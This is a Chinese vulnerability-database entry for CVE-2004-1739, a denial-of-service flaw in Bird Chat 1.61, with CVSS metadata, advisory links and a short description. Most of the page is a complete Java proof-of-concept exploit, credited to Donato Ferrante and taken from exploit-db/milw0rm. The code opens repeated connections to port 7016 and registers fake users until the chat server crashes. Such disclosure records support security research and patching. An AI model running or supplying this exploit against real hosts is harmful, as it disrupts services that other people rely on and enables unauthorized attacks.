Bird Chat远程服务拒绝漏洞-安全小百科

Bird Chat远程服务拒绝漏洞

漏洞ID	1108142	漏洞类型	其他
发布时间	2004-08-26	更新时间	2005-10-20
CVE编号	CVE-2004-1739	CNNVD-ID	CNNVD-200408-212
漏洞平台	Windows_x86	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/420
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-212

|漏洞详情

BirdChat1.61版本存在漏洞。远程攻击者借助无效的用户导致服务拒绝（崩溃）。

|漏洞EXP

/*
    Bird Chat 1.61 - Denial Of Service - Proof Of Concept
    Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;







public class BirdChat161_DoS_poc {



private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";



public static void main(String [] args){



  System.out.println(
                     "nnBird Chat 1.61 - Denial Of Service - Proof Of Conceptn" +
                     "Version: " + VERSION + "nn"                 +
                     "coded by: Donato Ferranten"                  +
                     "e-mail:   [email protected]"            +
                     "web:      www.autistici.org/fdonato;nn"
                    );


    String host = "localhost";

        try{

            if(args.length != 1)
                usage();

                host = args[0];

        }catch(Exception e){usage();}
    
        try{


            int i = 1,
                var = 0;


           while(i++ <= MAX_CONNECTION){

            try{

               String err = "";
               int port = PORT;
               InetAddress addr = InetAddress.getByName(host);
               Socket socket = new Socket(addr, port);
               socket.setSoTimeout(3000);



               InputStream stream = socket.getInputStream();

                  int line = stream.read();
                   while(line != -1){

                       if(line == '?'){
                           break;
                       }

                       line = stream.read();

                   }


               OutputStream outStream = socket.getOutputStream();
               outStream.write(("*user=fake_user0" + ++var + "n").getBytes());


                int count = 0;
               line = stream.read();
                    while(true){

                       line = stream.read();

                        if(line == 'n')
                           count++;

                       if(count >= 3)
                           break;
               }


            }catch(SocketTimeoutException ste){break;}
            catch(ConnectException ce){System.err.println(ce); continue;}
        }


        }catch(Exception e){System.err.println(e);}

        System.out.println("nBird Chat - Denial Of Service - Proof_Of_Concept terminated.nn");
    }







    private static void usage(){

        System.out.println("Usage: java BirdChat161_DoS_poc <host>nn");    
        System.exit(-1);
    }
}


// milw0rm.com [2004-08-26]

|参考资料

来源:SECUNIA
名称:12365
链接:http://secunia.com/advisories/12365
来源:XF
名称:bird-chat-dos(17080)
链接:http://xforce.iss.net/xforce/xfdb/17080
来源:BID
名称:11010
链接:http://www.securityfocus.com/bid/11010
来源:www.autistici.org
链接:http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
来源:BUGTRAQ
名称:20040823DoSinBirdChat1.61
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109327938924287&w;=2

相关推荐: DansGuardian Hex Encoded File Extension URI Content Filter Bypass Vulnerability

DansGuardian Hex Encoded File Extension URI Content Filter Bypass Vulnerability 漏洞ID 1098267 漏洞类型 Input Validation Error 发布时间 2004…

文章版权归作者所有，未经允许请勿转载。

THE END